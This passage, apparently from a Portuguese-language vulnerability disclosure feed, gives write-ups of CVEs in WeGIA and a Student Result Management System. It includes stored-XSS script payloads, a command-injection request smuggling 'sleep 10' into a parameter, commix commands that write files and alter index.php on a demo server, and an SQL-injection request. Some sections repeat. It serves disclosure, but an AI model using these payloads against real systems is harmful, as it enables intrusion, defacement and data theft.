rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/html/atendido/Cadastro_Atendido.php</code></p> <p>Parâmetro: <code>cpf</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>cpf</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Poc VulDBeeee'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> ;</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6699/image.png" width="1857" height="990" srcset="/p/cve-2025-6699/image_hu_353d8c63a12bb5cf.png 480w, /p/cve-2025-6699/image_hu_588c09aeb2830033.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="187" data-flex-basis="450px" /></p> <p><img src="/p/cve-2025-6699/image-1.png" width="1897" height="977" srcset="/p/cve-2025-6699/image-1_hu_2e98a5ecd10ad09a.png 480w, /p/cve-2025-6699/image-1_hu_cb0508422329be41.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="194" data-flex-basis="465px" /></p> <p><img src="/p/cve-2025-6699/image-2.png" width="1888" height="990" srcset="/p/cve-2025-6699/image-2_hu_b72551845a60d67a.png 480w, /p/cve-2025-6699/image-2_hu_e0f624d860a6c52d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="190" data-flex-basis="457px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/1RlctPW0nhw" target="_blank" rel="noopener" >https://youtu.be/1RlctPW0nhw</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6699.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6699.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 26 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-6475/ https://www.cvehunters.com/pt/p/cve-2025-6475/ <h2 id="cve-2025-6475-cross-site-scripting-xss-armazenado-no-endpoint-students-parâmetro-first-name">CVE-2025-6475: Cross-Site Scripting (XSS) Armazenado no endpoint <code>students</code> parâmetro <code>First Name</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6475" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6475</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>students</code> do aplicativo Student Result Management System 1.0 (SRMS 1.0) por Source Codester. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>First Name</code> da aplicação. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p><h2 id="cve-2025-6475-cross-site-scripting-xss-armazenado-no-endpoint-students-parâmetro-first-name">CVE-2025-6475: Cross-Site Scripting (XSS) Armazenado no endpoint <code>students</code> parâmetro <code>First Name</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6475" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6475</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>students</code> do aplicativo Student Result Management System 1.0 (SRMS 1.0) por Source Codester. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>First Name</code> da aplicação. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/srms/script/admin/students</code></p> <p>Parâmetro: <code>First Name</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>First Name</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB SRMS'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6475/image.png" width="1883" height="989" srcset="/p/cve-2025-6475/image_hu_71491be5bdea0f0e.png 480w, /p/cve-2025-6475/image_hu_92cd8e49ca5dfcb1.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="190" data-flex-basis="456px" /></p> <p><img src="/p/cve-2025-6475/image-1.png" width="1908" height="986" srcset="/p/cve-2025-6475/image-1_hu_cf4dd5bb1ea8a37b.png 480w, /p/cve-2025-6475/image-1_hu_fbd362652743b24f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="193" data-flex-basis="464px" /></p> <p><img src="/p/cve-2025-6475/image-2.png" width="1905" height="987" srcset="/p/cve-2025-6475/image-2_hu_3e8433f59e31d0f4.png 480w, /p/cve-2025-6475/image-2_hu_ad04074a8049b310.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="193" data-flex-basis="463px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/rBtUzvmoIxc" target="_blank" rel="noopener" >https://youtu.be/rBtUzvmoIxc</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6475.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6475.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 22 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-6477/ https://www.cvehunters.com/pt/p/cve-2025-6477/ <h2 id="cve-2025-6477-cross-site-scripting-xss-armazenado-no-endpoint-system-parâmetro-school-name">CVE-2025-6477: Cross-Site Scripting (XSS) Armazenado no endpoint <code>system</code> parâmetro <code>School Name</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6477" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6477</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>system</code> do aplicativo Student Result Management System 1.0 (SRMS 1.0) por Source Codester. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>School Name</code> da aplicação. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p><h2 id="cve-2025-6477-cross-site-scripting-xss-armazenado-no-endpoint-system-parâmetro-school-name">CVE-2025-6477: Cross-Site Scripting (XSS) Armazenado no endpoint <code>system</code> parâmetro <code>School Name</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6477" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6477</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>system</code> do aplicativo Student Result Management System 1.0 (SRMS 1.0) por Source Codester. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>School Name</code> da aplicação. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/srms/script/admin/students</code></p> <p>Parâmetro: <code>School Name</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>School Name</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB SRMS'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6477/image.png" width="1909" height="990" srcset="/p/cve-2025-6477/image_hu_7cde227e4d03ee28.png 480w, /p/cve-2025-6477/image_hu_a896ba7965cb155.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="462px" /></p> <p><img src="/p/cve-2025-6477/image-1.png" width="1909" height="989" srcset="/p/cve-2025-6477/image-1_hu_f09a3ad56b404d14.png 480w, /p/cve-2025-6477/image-1_hu_e0f5609d6ecb5124.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="193" data-flex-basis="463px" /></p> <p><img src="/p/cve-2025-6477/image-2.png" width="1887" height="1005" srcset="/p/cve-2025-6477/image-2_hu_117d198a06d18269.png 480w, /p/cve-2025-6477/image-2_hu_7046a41012ca59a3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="187" data-flex-basis="450px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/FhPQLGorbqA" target="_blank" rel="noopener" >https://youtu.be/FhPQLGorbqA</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6477.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6477.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 22 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-50201/ https://www.cvehunters.com/pt/p/cve-2025-50201/ <h2 id="cve-2025-50201-injeção-de-comando-no-sistema-operacional-cega-baseada-em-tempo-em-debug_infophp-parâmetro-branch">CVE-2025-50201: Injeção de Comando no Sistema Operacional (Cega Baseada em Tempo) em <code>debug_info.php</code> parâmetro <code>branch</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-50201" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-50201</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção de comando no sistema operacional foi identificada no endpoint <code>/html/configuracao/debug_info.php</code>. O parâmetro <code>branch</code> não é devidamente sanitizado antes de ser concatenado e executado em um comando shell no sistema operacional do servidor.</p> <p style="text-align: justify;">Essa falha permite que um invasor não autenticado execute comandos arbitrários no servidor com os privilégios do usuário do servidor web <code>(www-data)</code>. Isso compromete completamente a confidencialidade, a integridade e a disponibilidade do aplicativo e do servidor subjacente.</p><h2 id="cve-2025-50201-injeção-de-comando-no-sistema-operacional-cega-baseada-em-tempo-em-debug_infophp-parâmetro-branch">CVE-2025-50201: Injeção de Comando no Sistema Operacional (Cega Baseada em Tempo) em <code>debug_info.php</code> parâmetro <code>branch</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-50201" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-50201</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção de comando no sistema operacional foi identificada no endpoint <code>/html/configuracao/debug_info.php</code>. O parâmetro <code>branch</code> não é devidamente sanitizado antes de ser concatenado e executado em um comando shell no sistema operacional do servidor.</p> <p style="text-align: justify;">Essa falha permite que um invasor não autenticado execute comandos arbitrários no servidor com os privilégios do usuário do servidor web <code>(www-data)</code>. Isso compromete completamente a confidencialidade, a integridade e a disponibilidade do aplicativo e do servidor subjacente.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">A vulnerabilidade pode ser acionada enviando uma solicitação POST ao endpoint vulnerável e injetando metacaracteres de shell (como ;) no parâmetro branch. O servidor executa a entrada fornecida sem validação. A vulnerabilidade foi confirmada como "Cega", pois a saída do comando não é refletida diretamente na resposta HTTP, exigindo, portanto, técnicas de exploração baseadas em tempo.</p> <p>Solicitação Vulnerável Inicial:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">POST /html/configuracao/debug_info.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: demo.wegia.org </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: 39 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">branch=master; sleep 10&action=switch </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">A resposta tardia do servidor confirmou a vulnerabilidade.</p> <h2 id="poc">PoC </h2><p style="text-align: justify;">Para demonstrar um impacto tangível na integridade do sistema, a ferramenta commix foi usada para injetar um comando echo que cria um novo arquivo HTML em um diretório acessível pela web no servidor.</p> <h3 id="1-comando-de-ataque">1. Comando de Ataque: </h3><p style="text-align: justify;">The following command was executed to create the prova_tcc.html file on the server with custom content:</p> <pre><code>python3 commix.py -u "https://demo.wegia.org/html/configuracao/debug_info.php" \--data="branch=master&action=switch" -p "branch" -technique="time" \--os-cmd='echo "<h1>Server Hacked - Server Access Confirmed</h1>" > prova_tcc.html'</code></pre> <p><img src="/p/cve-2025-50201/image.png" width="1919" height="718" srcset="/p/cve-2025-50201/image_hu_3421cbc964fa3b64.png 480w, /p/cve-2025-50201/image_hu_3510a028ee9d8955.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="267" data-flex-basis="641px" /></p> <pre><code>python3 commix.py -u "https://demo.wegia.org/html/configuracao/debug_info.php" --data="branch=master&action=switch" -p "branch" --technique="time" --time-sec=2 --os-cmd='echo "teste" >> ../../index.php'</code></pre> <p><img src="/p/cve-2025-50201/image-1.png" width="1919" height="701" srcset="/p/cve-2025-50201/image-1_hu_ea0b5b7bb573c69a.png 480w, /p/cve-2025-50201/image-1_hu_9c883581664d6ba6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="273" data-flex-basis="657px" /></p> <h3 id="2-verificação">2. Verificação: </h3><p style="text-align: justify;">Após a execução do comando, o arquivo criado tornou-se publicamente acessível através do navegador na seguinte URL: <code>https://demo.wegia.org/html/configuracao/prova_tcc.html</code></p> <p><img src="/p/cve-2025-50201/image-2.png" width="1909" height="1079" srcset="/p/cve-2025-50201/image-2_hu_5fab827df7411270.png 480w, /p/cve-2025-50201/image-2_hu_3bc2d6e16b2b3902.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="176" data-flex-basis="424px" /></p> <p style="text-align: justify;">Após a execução do comando, a página <code>https://demo.wegia.org/</code> foi modificada conforme a imagem abaixo:</p> <p><img src="/p/cve-2025-50201/image-3.png" width="1906" height="1005" srcset="/p/cve-2025-50201/image-3_hu_a90f67d31bb417bd.png 480w, /p/cve-2025-50201/image-3_hu_89baf0ab6503b852.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="189" data-flex-basis="455px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">A exploração bem-sucedida desta vulnerabilidade permite que um invasor não autenticado: <ul> <li>Comprometa a Confidencialidade: Leia arquivos confidenciais do servidor, incluindo o código-fonte do aplicativo, chaves de API e arquivos de configuração.</li> <li>Comprometa a Integridade: Modifique ou exclua qualquer arquivo para o qual o usuário www-data tenha permissões de gravação, permitindo a desfiguração de sites, injeção de malware ou destruição de aplicativos.</li> <li>Comprometa a Disponibilidade: Execute comandos que consomem recursos do sistema (CPU, Memória), levando a uma Negação de Serviço (DoS).</li> <li>Aja como um Pivô: Use o servidor comprometido como base para atacar outros sistemas na rede interna.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-52p5-5fmw-9hrf" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-52p5-5fmw-9hrf</a></p> <h2 id="reportado-por">Reportado por </h2><p><a class="link" href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/pedro50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app" target="_blank" rel="noopener" >Pedro Lyrio</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 19 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-52474/ https://www.cvehunters.com/pt/p/cve-2025-52474/ <h2 id="cve-2025-52474-vulnerabilidade-de-injeção-sql-no-parâmetro-id-do-endpoint-controlphp">CVE-2025-52474: Vulnerabilidade de Injeção SQL no parâmetro <code>id</code> do endpoint <code>control.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-52474" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-52474</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Injeção SQL foi identificada no parâmetro <code>id</code> do endpoint <code>/WeGIA/controle/control.php</code>. Esta vulnerabilidade permite que invasores manipulem consultas SQL e acessem informações confidenciais do banco de dados, como nomes de tabelas e dados sensíveis.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>GET /controle/control.php?nomeClasse=MedicamentoControle&metodo=adicionarMedicamento&modulo=pet&nomeMedicamento=DApvMr&id=<PAYLOAD>&aplicacaoMedicamento=YqchRf&descricaoMedicamento=Mrnfdh HTTP/1.1</code></p> <p>Parâmetro: <code>id</code></p> <h2 id="poc">PoC </h2><p>Salve a solicitação no arquivo req.txt:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /controle/control.php?nomeClasse=MedicamentoControle&metodo=adicionarMedicamento&modulo=pet&nomeMedicamento=DApvMr&id=1&aplicacaoMedicamento=YqchRf&descricaoMedicamento=Mrnfdh HTTP/1.1 </span></span><span class="line"><span class="cl">Host: demo.wegia.org </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">sec-ch-ua-platform: "Windows" </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 </span></span><span class="line"><span class="cl">Accept: text/html, */*; q=0.01 </span></span><span class="line"><span class="cl">sec-ch-ua: "Chromium";v="136", "Google Chrome";v="136", "Not.A/Brand";v="99" </span></span><span class="line"><span class="cl">sec-ch-ua-mobile: ?0 </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Referer: https://demo.wegia.org/html/home.php </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7 </span></span><span class="line"><span class="cl">Cookie: _ga=GA1.1.2068698375.1747601288; _ga_F8DXBXLV8J=GS2.1.s1747660538$o4$g0$t1747660538$j60$l0$h0$dyaL3bJ27Uic34e3jqHnkw5lGenE0npxF8g; PHPSESSID=o79b1cq9suo2gksfpnvr4cus4o </span></span></code></pre></td></tr></table> </div> </div><p>Em seguida, use o sqlmap:</p><h2 id="cve-2025-52474-vulnerabilidade-de-injeção-sql-no-parâmetro-id-do-endpoint-controlphp">CVE-2025-52474: Vulnerabilidade de Injeção SQL no parâmetro <code>id</code> do endpoint <code>control.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-52474" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-52474</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Injeção SQL foi identificada no parâmetro <code>id</code> do endpoint <code>/WeGIA/controle/control.php</code>. Esta vulnerabilidade permite que invasores manipulem consultas SQL e acessem informações confidenciais do banco de dados, como nomes de tabelas e dados sensíveis.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>GET /controle/control.php?nomeClasse=MedicamentoControle&metodo=adicionarMedicamento&modulo=pet&nomeMedicamento=DApvMr&id=<PAYLOAD>&aplicacaoMedicamento=YqchRf&descricaoMedicamento=Mrnfdh HTTP/1.1</code></p> <p>Parâmetro: <code>id</code></p> <h2 id="poc">PoC </h2><p>Salve a solicitação no arquivo req.txt:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /controle/control.php?nomeClasse=MedicamentoControle&metodo=adicionarMedicamento&modulo=pet&nomeMedicamento=DApvMr&id=1&aplicacaoMedicamento=YqchRf&descricaoMedicamento=Mrnfdh HTTP/1.1 </span></span><span class="line"><span class="cl">Host: demo.wegia.org </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">sec-ch-ua-platform: "Windows" </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 </span></span><span class="line"><span class="cl">Accept: text/html, */*; q=0.01 </span></span><span class="line"><span class="cl">sec-ch-ua: "Chromium";v="136", "Google Chrome";v="136", "Not.A/Brand";v="99" </span></span><span class="line"><span class="cl">sec-ch-ua-mobile: ?0 </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Referer: https://demo.wegia.org/html/home.php </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Accept-Language: 